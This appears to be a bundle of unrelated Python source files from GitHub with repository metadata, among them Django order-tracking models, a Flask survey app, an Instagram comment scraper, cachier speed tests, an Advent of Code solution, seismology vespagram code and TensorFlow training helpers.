def delete(sender, instance, **kwargs):
instance.conffile.delete(False)
class ProcessElPrepare(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='proel',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "电路板准备"
class ProcessMePrepare(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prome',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "机械件准备"
class ProcessScPrepare(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prosc',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "干涉仪准备"
class ProcessAssemble(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='proas',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "装配中"
class ProcessTesting(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prots',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "测试中"
def __str__(self):
return self.orderid.customer
# 添加软件状态
class ProcessSoftware(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prosw',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "软件"
def __str__(self):
return self.orderid.customer
# 添加付款状态
class ProcessPayment(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='propm',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "付款"
def __str__(self):
return self.orderid.customer
# 添加发货状态
class ProcessDeliver(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='prodi',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "发货"
def __str__(self):
return self.orderid.customer
# 添加开票状态
class ProcessBilling(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='probi',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "开票"
def __str__(self):
return self.orderid.customer
# 添加尾款状态
class ProcessDueing(CommonInfo):
orderid = models.OneToOneField(
Productplan,
on_delete=models.CASCADE,
related_name='produe',
primary_key=True
)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "尾款"
def __str__(self):
return self.orderid.customer
class ProductHistory(models.Model):
# 操作者
user = models.ForeignKey(
User,
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='user'
)
# 订单
orderid = models.ForeignKey(
Productplan,
verbose_name="订单号",
on_delete=models.CASCADE,
related_name='product_history',
primary_key=False
)
# 操作项目
proitem = models.CharField(max_length=10, verbose_name="操作项目")
# 新内容
newcontent = models.CharField(max_length=10, verbose_name="新内容")
# 操作时间
operateday = models.DateTimeField(verbose_name="操作时间", null=True)
# 更新时间
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-updated',)
verbose_name_plural = "订单历史"
def __str__(self):
return self.orderid.customer
|
willmaker2022/drfvueblog
|
productplan/models.py
|
models.py
|
py
| 6,808 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26846946693
|
n = ['casa','branco','verde']
for ordem,lista in enumerate(n): #
print(f'{ordem+1}° {lista}' ,end=(' '))
print()
lanche = ["X,Salada","Hot Dog","Misto Quente","Coca Cola","Pastel",]
lanche.append("Bacon") #Adcionar
lanche.sort() #Organizar (ordem alfabética)
lanche.sort(reverse=True) #Organiza Inverso
lanche.insert(3,"Calabresa") #Inseri na posição algo
#lanche.pop(1) #Remove o último caracter
#lanche.remove("Misto Quente")
print(len(lanche))
print(lanche)
for d in range(0,4):
lanche.append(str(input("O que quer acrescentar? ")))
for c,d in enumerate(lanche):
print(f"No cardapio comprei {d.strip()} que era o {c} da lista")
a = [2,3,4,7]
b = a[:] #CÓPIA
b[2] = 8 #Substituiu o 4 por 8
print(f"Lista A: {a}")
print(f"Lista B: {b}")
|
davileal7/curso-python
|
curso em video/17 Listas 1.py
|
17 Listas 1.py
|
py
| 761 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
30097122943
|
""" Comments scraper class"""
import json
import logging
import random
from time import sleep
import numpy as np
import pandas as pd
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from scripts.argparser import ArgParser
from scripts.auxiliary.scraper_aux import check_or_create_folders, save
from scripts.chrome_driver import ChromeDriver
logging.basicConfig(
format="%(asctime)s | %(levelname)s: %(message)s", level=logging.CRITICAL
)
class CommentsScraper:
def __init__(self):
pass
@staticmethod
def iterate(args, ttw, driver):
# ~ 24 comments loaded each iteration
check = True
MAX_ITER = int(args.max_iterations)
n = 0
while check and n <= MAX_ITER:
sleep(int(random.choice(ttw)))
try:
load_more_comments_button = WebDriverWait(driver, 5).until(
EC.visibility_of_element_located(
(By.CSS_SELECTOR, "[aria-label='Load more comments']")
)
)
load_more_comments_button.click()
except:
check = False
if n == MAX_ITER:
logging.warning(
"Reached the max iterations number before exhausting the post comments. \
You may consider to raise the max iterations number"
)
else:
logging.info("Exhausted all the post comments")
n = n + 1
@classmethod
def setup(self):
argparser = ArgParser()
chrome_driver = ChromeDriver()
proxy = chrome_driver.set_up_proxy()
args = argparser.likes_scraper_read_input()
driver = chrome_driver.set_up_driver(proxy=proxy)
driver = chrome_driver.make_IG_access_w_creds(
driver=driver, ig_usr=args.username, ig_pass=args.password
)
return driver, proxy, args
@classmethod
def scrape(self, driver, proxy, args, save_raw_data=bool, **kwargs):
if "target_post" in kwargs:
proxy.new_har(
kwargs.get("target_post"),
options={"captureHeaders": True, "captureContent": True},
)
driver.get(kwargs.get("target_post"))
target = kwargs.get("target_post")
else:
proxy.new_har(
args.target_post,
options={"captureHeaders": True, "captureContent": True},
)
driver.get(args.target_post)
target = args.target_post
# Random time intervals to sleep between load more comment button pushes
ttw = []
for i in range(0, 20):
ttw.append(np.round(random.uniform(4, 8), 2))
# ~ 24 comments loaded each iteration
CommentsScraper.iterate(args=args, ttw=ttw, driver=driver)
R = json.loads(json.dumps(proxy.har, ensure_ascii=False))
if save_raw_data:
save(data=R, target=target, args=args)
return R
@classmethod
def parse_and_save_data(self, raw_data, args, target):
"Parse raw scraped data and write to disk"
RAW = {}
for n, v in enumerate(raw_data["log"]["entries"]):
if v["response"]["content"]["mimeType"] in [
"application/json; charset=utf-8",
"application/json",
]:
try:
RAW[n] = json.loads(v["response"]["content"]["text"])["comments"]
except:
pass
comments_df = pd.DataFrame.from_dict(RAW[list(RAW.keys())[0]])
for k in list(RAW.keys())[1:]:
comments_df = pd.concat([comments_df, pd.DataFrame.from_dict(RAW[k])])
comments_df = comments_df.reset_index(drop=True)
check_or_create_folders(target=target, args=args)
short_code = target.split("/")[-1]
# TODO FIX get the profile name from somewhere and create the correct folder!
comments_df.to_csv(
f"{args.output_folder}/{short_code}_comments_clean.csv", mode="w+"
)
logging.info("Data correctly saved/overwrote.")
# print(f'Dave saved in: {f"{args.output_folder}_{short_code}_comments_clean.csv"}')
return comments_df
|
ScrPzz/InstagramScraper
|
src/comments_scraper.py
|
comments_scraper.py
|
py
| 4,554 |
python
|
en
|
code
| 2 |
github-code
|
6
|
73815165306
|
from random import random
from time import time
from cachier import cachier
@cachier(next_time=True)
def _test_int_pickling(int_1, int_2):
"""Add the two given ints."""
return int_1 + int_2
def _test_int_pickling_compare(int_1, int_2):
"""Add the two given ints."""
return int_1 + int_2
def test_pickle_speed():
"""Test speeds"""
print("Comparing speeds of decorated vs non-decorated functions...")
num_of_vals = 1000
times = []
for i in range(1, num_of_vals):
tic = time()
_test_int_pickling_compare(i, i + 1)
toc = time()
times.append(toc - tic)
print(' - Non-decorated average = {:.8f}'.format(
sum(times) / num_of_vals))
_test_int_pickling.clear_cache()
times = []
for i in range(1, num_of_vals):
tic = time()
_test_int_pickling(i, i + 1)
toc = time()
times.append(toc - tic)
print(' - Decorated average = {:.8f}'.format(
sum(times) / num_of_vals))
@cachier()
def _test_single_file_speed(int_1, int_2):
"""Add the two given ints."""
# something that takes some memory
return [random() for _ in range(1000000)]
@cachier(separate_files=True)
def _test_separate_files_speed(int_1, int_2):
"""Add the two given ints."""
# something that takes some memory
return [random() for _ in range(1000000)]
def test_separate_files_vs_single_file():
_test_separate_files_speed.clear_cache()
_test_single_file_speed.clear_cache()
start_time = time()
for i in range(3):
for j in range(10):
_test_separate_files_speed(j, 2)
print(f'separate files time: {time() - start_time}')
start_time = time()
for i in range(3):
for j in range(10):
_test_single_file_speed(j, 2)
print(f'single file time: {time() - start_time}')
if __name__ == '__main__':
test_pickle_speed()
|
python-cachier/cachier
|
tests/speed_eval.py
|
speed_eval.py
|
py
| 1,903 |
python
|
en
|
code
| 470 |
github-code
|
6
|
14979508665
|
"""
Funny Strings Problem on HackerRank
Problem Link: https://www.hackerrank.com/challenges/funny-string/problem
Author: Shyam Kumar (@svshyam91)
"""
def funnyString(s):
# Make the list of ascii of characters of string
ascii_str=[ord(c) for c in s]
ascii_str_rev=ascii_str[::-1] # Reverse the ascii list
for i in range(1,len(ascii_str)):
if abs(ascii_str[i]-ascii_str[i-1]) != abs(ascii_str_rev[i]-ascii_str_rev[i-1]):
return "Not Funny"
return "Funny"
if __name__ == '__main__':
q = int(input())
for q_itr in range(q):
s = input()
result = funnyString(s)
print(result)
|
svshyam91/hacker_rank_solutions
|
funny_string.py
|
funny_string.py
|
py
| 676 |
python
|
en
|
code
| 0 |
github-code
|
6
|
392386374
|
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
# random data
A = [2,5,7,9,11,16,19,23,22,29,29,35,37,40,46]
b = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]
# Visualize data
plt.plot(A,b,'ro')
# array to [[ ]]
# change row vector to column vector
A = np.array([A]).T
b = np.array([b]).T
# Create vector 1
ones = np.ones_like(A, dtype = np.int8)
A = np.concatenate((A,ones),axis = 1)
# Use formula
x = np.linalg.inv(A.transpose().dot(A)).dot(A.transpose()).dot(b)
x0 = np.array([1,46]).T
y0 = x[0][0]*x0 + x[1][0]
# ko co phep toan matrix cong mot so
# nhung trong numpy cong mot so voi tat ca cac phan tu cua matrix
# Test predict data
x_test = 12
y_test = x[0][0]*x_test + x[1][0]
print(y_test)
# Visualize x0,y0
plt.plot(x0,y0)
plt.show()
|
suanthuy/AI_Project
|
Unit3.1_linear.py
|
Unit3.1_linear.py
|
py
| 773 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27610406237
|
from flask import Flask, request, render_template, redirect, flash, session
from flask_debugtoolbar import DebugToolbarExtension
from surveys import surveys, satisfaction_survey, personality_quiz
app = Flask(__name__)
app.config['SECRET_KEY'] = "secret_code_here"
# app.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False
# debug = DebugToolbarExtension(app)
@app.route('/')
def choose_the_servey():
""" start-page that allows a user to choose a survey from a survey list """
return render_template('choose_survey.html', surveys=surveys.items())
@app.route('/start-page', methods=['POST'])
def start_survey():
"""render a page for the chosen survey that shows the user the title of the survey, the instructions, and a button to start the survey;
setup session variables """
current_survey=surveys[request.form.get('choice')] #current survey object
session['title'] = current_survey.title
session['num_of_questions'] = len(current_survey.questions)
session['survey'] = request.form['choice'] # key of current survey in surveys list
session['comments'] = []
return render_template('start.html', instructions = current_survey.instructions)
@app.route('/start', methods=['POST'])
def handling_start():
""" Set a current session responses-list to an empty list and redirect to the start of the survey """
session['responses'] = []
return redirect('/questions/0')
@app.route('/questions/<question_number>')
def question_page(question_number):
""" Page shows a form asking the current question, and listing the choices as radio buttons, also comments if are allowed """
answers = session['responses']
if len(answers) == session['num_of_questions']:
return render_template('thanks.html')
if len(answers) == int(question_number):
number = int(question_number)
else:
flash('Could you please answer this question, you tried to access an invalid question','error')
number = len(answers)
current_survey = surveys[session['survey']]
current_question = current_survey.questions[number]
return render_template('question.html', number = number, choices = current_question.choices, question = current_question.question, title = current_survey.title, allow_text = current_question.allow_text)
@app.route('/answer', methods=['POST'])
def handling_answer():
""" function appends the answer to responses list, adds comments if necessary and then redirect user to the next question; if no more questions in the survey - render thanks page ."""
comment = request.form.get('comment')
current_answer = request.form.get('choice')
answers = session['responses']
if current_answer:
answers.append(current_answer)
session['responses'] = answers
if comment:
comments = session['comments']
comments.append((len(answers),comment))
session['comments'] = comments
else:
flash('We are still waiting for your response!','error')
if len(answers) < session['num_of_questions']:
next_question = f"/questions/{len(answers)}"
return redirect(next_question)
else:
return render_template('thanks.html')
|
Tetyana-I/flask-survey
|
app.py
|
app.py
|
py
| 3,204 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73652466109
|
class Solution(object):
res = []
def postorder(self, root):
"""
:type root: Node
:rtype: List[int]
"""
self.res = []
self.postorder_find(root)
return self.res
def postorder_find(self, root):
if root == None:
return
for child in root.children:
self.postorder_find(child)
self.res.append(root.val)
|
xxxxlc/leetcode
|
tree/postorder.py
|
postorder.py
|
py
| 430 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7824439491
|
#LIBRERIAS A UTILIZAR
import pandas as pd
from sklearn.impute import SimpleImputer
import numpy as np
from sklearn.preprocessing import LabelEncoder
import matplotlib.pyplot as plt
import seaborn as seabornInstance
from sklearn.model_selection import train_test_split #libreria para poder separar los datos entre entrenamiento y test
from sklearn.linear_model import LinearRegression #libreria para poder generar la regresion lineal
from sklearn import metrics
#ANALISIS PREVIO
"""
En el analisis previo con solo mirar el archivo, puedo deducir que es un archivo que contiene
edad de una persona, sexo de la persona solicitante del seguro,bmi(segun lo que googlie es un reembolso que se le puede dar),
cuantos hijos tiene, si es fumador o no, y el precio del seguro a abonar.
De esto puedo inferir que mi prediccion va a ser con una regresion lineal multiple ya que la variable dependiete es el cargo del seguro, y es afectada
por todas las demas columnas, es decir, un seguro aumentara por todas las condiciones anteriores(edad, bmi, hijos, si es fumador o no y de que zona es la persona solicitante)
"""
#-------------GUARDO MI ARCHIVO A USAR -------------------------------
ruta =r'Unsam.Clase.12.4.6.2021\Unsam.Clase.12.4.6.2021\cvs_para_el_TP\seguro.csv'
dataSet = pd.read_csv(ruta) #archivo a utilizar
#-----------------ANALISIS DE MIS DATOS ---------------------
print(dataSet)
#print("CANTIDAD DE FILAS Y COLUMNAS")
#print(dataSet.shape)
#no hace falta hacer el shape ya que al imprimir el dataSet, me dice cuantas filas y columnas tengo
print(dataSet.describe())
#compruebo si hay valores nan en mi codigo
print("Valores null o nan en el dataSet: ")
print(dataSet.isna().values.any())
print(dataSet.isnull().values.any())
#devuelve falso por ende no tengo valores NaN o null
#-------------SEPARO LAS VARIABLES QUE VOY A USAR------------
X = dataSet[['age','sex','bmi','children','smoker','region' ]].values
Y = dataSet['charges'].values
print("X:\n")
print(X) #matriz /variables independientes
print("Y:\n")
print(Y) #vector /variables dependientes
#----------------COMIENZO A PREPARAR LOS DATOS-------------
"""
La edad y el bmi, son valores numericos ya manipulables , por ende , los dejo como estan para poder realizar mi analisis
"""
#MODIFICO LA COLUMNA DEL SEXO PARA MANEJARME CON 1 Y 0
labelencoder_X=LabelEncoder()
X[:,1]=labelencoder_X.fit_transform(X[:,1])
#MODIFICO LA COMLUNMA DE SI ES FUMADOR CON 1 Y 0
labelencoder_X=LabelEncoder()
X[:,4]=labelencoder_X.fit_transform(X[:,4])
#MODIFICO LA COLUMNNA DE SUR Y NORTE (CON ORIENTACION ESTE Y OESTE)
labelencoder_X=LabelEncoder()
X[:,-1]=labelencoder_X.fit_transform(X[:,-1])
print("Matriz X luego de preparacion de datos : \n")
print(X)
#PREGUNTAR SI HAY QUE ESCALAR LA EDAD?
#-------------GRAFICO MI VARIABLE DEPENDIENTE PARA SACAR ALGUNA CONCLUSION -----------
plt.figure(figsize=(10,5))
plt.tight_layout()
plt.title('Densidad de mi variable Dependiente')
seabornInstance.distplot(dataSet['charges'], color = 'lightblue')
plt.show()
"""
De este Grafico podemos concluir que mi variable dependiente 'charges' que seria el precio a pagar del seguro,
varia entre 0 y 70000 , y la mayor densidad(mayor cantidad de match) las hace desde el 0 hasta el 10000 aproximadamente.
"""
#------------------DIVIDIR LOS DATOS EN ENTRENAMIENTO Y TEST -----------------
#80 porciento de mis datos en entrenamiento y 20 en test
X_train , X_test, Y_train, Y_test = train_test_split(X , Y , test_size = 0.2, random_state=0)
#comienzo a entrenar mi modelo
regressor = LinearRegression()
regressor.fit(X_train, Y_train)
#------------------ELIMINO MI COLUMNA QUE ES LA DE CARGOS(VARIABLE DEPENDIENTE)-----------
dataFrame= dataSet.drop(['charges'], axis = 1) #dropeo(elimino) mi variale dependiente de mi data frame
dataFrame = dataFrame.T #transpongo filas por columnas PODRIA SER TRANSPOSE()
dataFrame = dataFrame.index #me guardo en mi dataframe solo las etiquetas
print(dataFrame) #imprimo las etiquetas para verificar que estan bien guardadas
#-----------------ENCONTRAR LOS COEFICIENTES MAS OPTIMOS PARA MIS ATRIBUTOS----------------
coeficiente_dataFrame = pd.DataFrame(regressor.coef_, dataFrame, columns= ['Coeficiente'])
print(coeficiente_dataFrame)
#luego de imprimir concluyo que transpuso filas por columnas y tiene sus coeficentes correspondientes
#---------------PREDICCION--------------------
y_prediccion = regressor.predict(X_test)
#agarro mi dataFrame donde estan mis indices
dataFrame = pd.DataFrame({'Actual': Y_test, 'Prediccion': y_prediccion})
dataFrame_prediccion = dataFrame.head(30)
print(dataFrame_prediccion)
#-------------------GRAFICO MI PREDICCION -----------------
dataFrame_prediccion.plot(kind='bar',figsize=(10,8)) #LE DIGO QUE ES UN GRAFICO DE BARRAS Y EL TAMAÑO
plt.title('Actual vs Prediccion')
plt.grid(which='major', linestyle='-', linewidth='0.5', color='black')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
#----------------ME FIJO EL RENDIMIENTO DE MI ALGORITMO ---------------
print('Promedio de Error Absoluto:', metrics.mean_absolute_error(Y_test, y_prediccion))
print('Promedio de Error de Raiz:', metrics.mean_squared_error(Y_test, y_prediccion))
print('Error cuadratico medio de la raiz:', np.sqrt(metrics.mean_squared_error(Y_test, y_prediccion)))
#CONCLUSION FINAL
"""
Por el analisis hecho, podemos deducir que la prediccion no es nada buena, ya que los promedios de error
superan ampliamente el 10 porciento, es aproximadamente, un 15 porciento (siendo generoso), no es un analisis muy exacto, pero para nuestro caso
es aceptable(porque use regresion lineal multiple, entonces entre mas datos afecten a mi variable dependiente , menos me voy a acercar a una prediccion acertada),
ya que las columnas en las que supera ese porcentaje son la 14 , la 20 y la 23, que siendo generoso tendrian aproximadamente un 25 porciento extra.
"""
"""
PD: Perdon por mi manera de hablar o escribir pero la verdad que en las conclusiones tarde mas que en el codigo jajaja.
Si hay algo que deba cambiar o mejorar porfavor diganmelo
Muchas gracias por TODO
Atte : Alex Sosa :)
"""
|
alextsosa17/Analisis-de-Datos-y-prediccion--Python
|
TpFinalAlexSosa.py
|
TpFinalAlexSosa.py
|
py
| 6,299 |
python
|
es
|
code
| 0 |
github-code
|
6
|
3508302141
|
#!/usr/bin/env python3
class Tile:
def __init__(self, x: int, y: int):
self._x = x
self._y = y
self._c = 'W'
self._nc = None
def nw(self):
return self._x - 1, self._y - 1
def ne(self):
return self._x + 1, self._y - 1
def sw(self):
return self._x - 1, self._y + 1
def se(self):
return self._x + 1, self._y + 1
def w(self):
return self._x - 2, self._y
def e(self):
return self._x + 2, self._y
def flip(self):
self._c = 'B' if self._c == 'W' else 'W'
def flip_later(self):
assert self._nc is None
self._nc = 'B' if self._c == 'W' else 'W'
# print('flipping later', self._x, self._y, 'to', self._nc)
def commit(self):
if self._nc is not None:
self._c = self._nc
self._nc = None
@property
def color(self):
return self._c
class Floor:
def __init__(self):
self._f = {}
def get(self, x, y):
if not (x, y) in self._f:
self._f[(x, y)] = Tile(x, y)
return self._f[(x, y)]
def count(self, c: str):
count = 0
for tile in self._f.values():
if tile.color == c:
count += 1
return count
def x_lim(self):
max, min = None, None
for coord in self._f:
if max is None or coord[0] > max:
max = coord[0]
if min is None or coord[0] < min:
min = coord[0]
return min, max
def y_lim(self):
max, min = None, None
for coord in self._f:
if max is None or coord[1] > max:
max = coord[1]
if min is None or coord[1] < min:
min = coord[1]
return min, max
def count_adj(self, tile: Tile, c: str):
count = 0
count += int(self.get(*tile.ne()).color == c)
count += int(self.get(*tile.nw()).color == c)
count += int(self.get(*tile.e()).color == c)
count += int(self.get(*tile.w()).color == c)
count += int(self.get(*tile.se()).color == c)
count += int(self.get(*tile.sw()).color == c)
return count
def flip(self):
# for coord, tile in dict(self._f).items():
x_min, x_max = self.x_lim()
y_min, y_max = self.x_lim()
for x in range(x_min - 1, x_max + 2):
for y in range(y_min - 1, y_max + 2):
tile = self.get(x,y)
if tile.color == 'B' and self.count_adj(tile, 'B') in [0, 3, 4, 5, 6]:
tile.flip_later()
if tile.color == 'W' and self.count_adj(tile, 'B') == 2:
tile.flip_later()
for _, tile in self._f.items():
tile.commit()
floor = Floor()
for seq in open('24.input').readlines():
tile = floor.get(0, 0)
c_iter = iter(seq)
while True:
c = next(c_iter)
if c == 'n':
c = next(c_iter)
if c == 'e':
x, y = tile.ne()
elif c == 'w':
x, y = tile.nw()
else:
raise ValueError('unknown north')
elif c == 's':
c = next(c_iter)
if c == 'e':
x, y = tile.se()
elif c == 'w':
x, y = tile.sw()
else:
raise ValueError('unknown south')
elif c == 'e':
x, y = tile.e()
elif c == 'w':
x, y = tile.w()
elif c == '\n':
break
else:
raise ValueError('unknown direction', c)
tile = floor.get(x, y)
tile.flip()
black = floor.count('B')
print('initial black tiles', black)
for day in range(1, 101):
floor.flip()
print(day, floor.count('B'))
|
pboettch/advent-of-code
|
2020/24.py
|
24.py
|
py
| 3,821 |
python
|
en
|
code
| 1 |
github-code
|
6
|
25875832480
|
#!/usr/bin/env python
# This is more of a work in progress, but this script will
# test the code for creating vespagrams with our curved wavefront correction.
import obspy
import numpy as np
import time
import matplotlib.pyplot as plt
import circ_array as c
from circ_beam import Vespagram_Lin, Vespagram_PWS, Baz_vespagram_PWS, Baz_vespagram_Lin
from array_plotting import plotting
# parameters
# phase of interest
phase = 'SKS'
phases = ['SKS','SKKS','ScS','Sdiff','sSKS','sSKKS','PS','SKKKS','pSKS']
# frequency band
fmin = 0.13
fmax = 0.26
st = obspy.read('./data/19970525/*SAC')
# get array metadata
event_time = c.get_eventtime(st)
geometry = c.get_geometry(st)
distances = c.get_distances(st,type='deg')
mean_dist = np.mean(distances)
stations = c.get_stations(st)
# get travel time information and define a window
Target_phase_times, time_header_times = c.get_predicted_times(st,phase)
avg_target_time = np.mean(Target_phase_times)
min_target = int(np.nanmin(Target_phase_times, axis=0))
max_target = int(np.nanmax(Target_phase_times, axis=0)) + 100
stime = event_time + min_target
etime = event_time + max_target
# trim the stream
# Normalise and cut seismogram around defined window
st = st.copy().trim(starttime=stime, endtime=etime)
st = st.normalize()
# get predicted slownesses and backazimuths
predictions = c.pred_baz_slow(
stream=st, phases=phases, one_eighty=True)
# find the line with the predictions for the phase of interest
row = np.where((predictions == phase))[0]
P, S, BAZ, PRED_BAZ_X, PRED_BAZ_Y, PRED_AZ_X, PRED_AZ_Y, DIST, TIME = predictions[row, :][0]
# make the box around the prediction to search over
smin=float(S)-2
smax=float(S)+6
s_step=0.1
# filter
st = st.filter('bandpass', freqmin=fmin, freqmax=fmax,
corners=4, zerophase=True)
# get the traces and phase traces
Traces = c.get_traces(st)
Phase_traces = c.get_phase_traces(st)
# get sampleing rate
sampling_rate=st[0].stats.sampling_rate
# slowness vespagrams
vesp_lin = Vespagram_Lin(traces=Traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, baz=float(BAZ), smin=smin, smax=smax, s_space=s_step)
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(211)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_lin, ymin=smin, ymax=smax, y_space=s_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Slow - Lin", predictions=predictions, type='slow',
envelope=True)
vesp_pws = Vespagram_PWS(traces=Traces, phase_traces=Phase_traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, baz=float(BAZ), smin=smin, smax=smax, s_space=s_step, degree=2)
ax = fig.add_subplot(212)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_pws, ymin=smin, ymax=smax, y_space=s_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Slow - PWS", predictions=predictions, type='slow',
envelope=True)
plt.tight_layout()
plt.show()
# backazimuth vespagrams
bmin=float(BAZ)-30
bmax=float(BAZ)+30
b_step=0.05
vesp_lin = Baz_vespagram_Lin(traces=Traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, slow=float(S), bmin=bmin, bmax=bmax, b_space=b_step)
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(211)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_lin, ymin=bmin, ymax=bmax, y_space=b_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Baz - Lin", predictions=predictions, type='baz',
envelope=True)
vesp_pws = Baz_vespagram_PWS(traces=Traces, phase_traces=Phase_traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, slow=float(S), bmin=bmin, bmax=bmax, b_space=b_step, degree=2)
ax = fig.add_subplot(212)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_pws, ymin=bmin, ymax=bmax, y_space=b_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Baz - PWS", predictions=predictions, npeaks=5, type='baz',
envelope=True)
plt.tight_layout()
plt.show()
|
eejwa/Array_Seis_Circle
|
examples/Vespagram_test.py
|
Vespagram_test.py
|
py
| 4,213 |
python
|
en
|
code
| 7 |
github-code
|
6
|
72344006587
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import datasets
import utils
FLAGS = tf.flags.FLAGS
def get_lr(global_step, base_lr, steps_per_epoch, # pylint: disable=missing-docstring
decay_epochs, lr_decay_factor, warmup_epochs):
warmup_lr = 0.0
if warmup_epochs > 0:
warmup_lr = (tf.cast(global_step, tf.float32) *
(base_lr / (warmup_epochs * steps_per_epoch)))
normal_lr = tf.train.piecewise_constant(
global_step,
[e * steps_per_epoch for e in decay_epochs],
[base_lr * (lr_decay_factor ** i) for i in range(len(decay_epochs) + 1)]
)
lr = tf.cond(tf.less(global_step, warmup_epochs * steps_per_epoch),
lambda: warmup_lr,
lambda: normal_lr)
return lr
# TODO(akolesnikov): add more logging
class Trainer(object):
"""Base trainer class."""
def __init__(self,
update_batchnorm_params=True):
self.update_batchnorm_params = update_batchnorm_params
split = FLAGS.get_flag_value('train_split', 'train')
num_samples = datasets.get_count(split)
steps_per_epoch = num_samples // FLAGS.batch_size
global_step = tf.train.get_or_create_global_step()
self.global_step_inc = tf.assign_add(global_step, 1)
# lr_scale_batch_size defines a canonical batch size that is coupled with
# the initial learning rate. If actual batch size is not the same as
# canonical than learning rate is linearly scaled. This is very convinient
# as this allows to vary batch size without recomputing learning rate.
lr_factor = 1.0
if FLAGS.get_flag_value('lr_scale_batch_size', 0):
lr_factor = FLAGS.batch_size / float(FLAGS.lr_scale_batch_size)
deps = FLAGS.get_flag_value('decay_epochs', None)
decay_epochs = utils.str2intlist(deps) if deps else [FLAGS.epochs]
self.lr = get_lr(
global_step,
base_lr=FLAGS.lr * lr_factor,
steps_per_epoch=steps_per_epoch,
decay_epochs=decay_epochs,
lr_decay_factor=FLAGS.get_flag_value('lr_decay_factor', 0.1),
warmup_epochs=FLAGS.get_flag_value('warmup_epochs', 0))
# TODO(marvinritter): Re-enable summaries with support for TPU training.
# tf.summary.scalar('learning_rate', self.lr)
def get_train_op(self, loss, # pylint: disable=missing-docstring
var_list=None,
add_reg_loss=True,
use_tpu=False):
if add_reg_loss:
l2_loss = tf.reduce_sum(tf.losses.get_regularization_losses())
loss += l2_loss
optimizer = FLAGS.get_flag_value('optimizer', 'sgd')
if optimizer == 'sgd':
optimizer = tf.train.MomentumOptimizer(learning_rate=self.lr,
momentum=0.9)
elif optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)
else:
raise ValueError('Unknown optimizer: %s' % optimizer)
if use_tpu:
# Wrap optimizer in CrossShardOptimizer which takes care of
# synchronizing the weight updates between TPU cores.
optimizer = tf.contrib.tpu.CrossShardOptimizer(optimizer)
opt_step = optimizer.minimize(loss, var_list=var_list,
colocate_gradients_with_ops=True)
if self.update_batchnorm_params:
opt_step = tf.group([opt_step] +
tf.get_collection(tf.GraphKeys.UPDATE_OPS))
opt_step = tf.group([opt_step, self.global_step_inc])
return opt_step
def make_estimator(mode, loss=None, eval_metrics=None, predictions=None):
"""Returns an EstimatorSpec (maybe TPU) for all modes."""
# Always use TPUEstimator, even when not using TPU, then it's (almost) no-op.
spec_type = tf.contrib.tpu.TPUEstimatorSpec
if mode == tf.estimator.ModeKeys.PREDICT:
assert predictions is not None, 'Need to pass `predict` arg.'
return spec_type(mode=mode, predictions=predictions)
if mode == tf.estimator.ModeKeys.EVAL:
return spec_type(mode=mode, loss=loss, eval_metrics=eval_metrics)
